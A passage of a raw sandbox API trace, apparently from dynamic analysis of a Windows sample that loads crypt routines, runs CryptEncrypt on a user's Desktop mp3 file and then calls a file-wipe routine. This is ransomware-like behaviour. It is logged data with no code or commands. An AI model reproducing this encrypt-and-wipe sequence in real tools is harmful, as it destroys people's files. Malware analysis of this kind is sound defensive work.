dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0077.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0077.156] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.156] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.156] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.156] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.157] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.157] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.157] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.157] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.157] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.157] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.157] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.157] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.157] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.158] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x5c46, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x5c50) returned 1 [0077.158] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.158] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.158] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.158] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.158] CharLowerBuffW (in: lpsz="byte[23633]", cchLength=0xb | out: lpsz="byte[23633]") returned 0xb [0077.159] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.162] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.162] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.162] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.162] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.162] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7a1898*, pdwDataLen=0x61e2d8*=0x5c46, dwBufLen=0x5c50 | out: pbData=0x7a1898*, pdwDataLen=0x61e2d8*=0x5c50) returned 1 [0077.163] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.163] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.163] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.198] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.198] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.198] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.198] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.198] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.198] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.198] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.198] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.198] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.198] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.198] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0077.198] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.198] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.198] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.203] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.203] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.203] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.207] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.207] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.207] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.207] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0077.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.207] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0077.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.207] CryptDestroyKey (hKey=0x6b8af8) returned 1 [0077.207] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0077.207] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0077.207] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.207] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0077.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.207] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0077.207] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0077.207] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0077.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.207] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0077.208] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0077.208] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0077.208] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0077.208] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0077.208] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.208] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.208] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.208] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.208] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.208] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.208] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0077.208] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.208] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0077.208] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.208] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0077.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.209] CryptReleaseContext (hProv=0x696a48, dwFlags=0x0) returned 1 [0077.209] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.209] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.209] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0077.209] FreeLibrary (hLibModule=0x77710000) returned 1 [0077.209] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.209] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.209] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.211] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.212] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.212] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.212] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0077.212] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.213] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.213] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.mp3", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9408690, ftCreationTime.dwHighDateTime=0x1d5e56a, ftLastAccessTime.dwLowDateTime=0x7aadcd00, ftLastAccessTime.dwHighDateTime=0x1d5d8d2, ftLastWriteTime.dwLowDateTime=0x7aadcd00, ftLastWriteTime.dwHighDateTime=0x1d5d8d2, nFileSizeHigh=0x0, nFileSizeLow=0x5c46, dwReserved0=0x0, dwReserved1=0x657690, cFileName="9MGcT.mp3", cAlternateFileName="")) returned 0x6b8b38 [0077.213] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0077.213] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.213] CharLowerBuffW (in: lpsz="byte[23622]", cchLength=0xb | out: lpsz="byte[23622]") returned 0xb [0077.213] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.213] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0077.213] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.213] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0077.214] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0077.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0077.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0077.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0077.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7) returned 0x6bb558 [0077.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb558, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0077.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.215] FreeLibrary (hLibModule=0x76f90000) returned 1 [0077.215] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a7770 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0077.215] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0077.215] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0077.215] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0077.215] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0077.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0077.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0077.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0077.216] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.216] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.222] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.222] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.222] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0077.222] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.222] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.222] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.222] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.223] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0077.223] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.223] RtlAllocateHeap 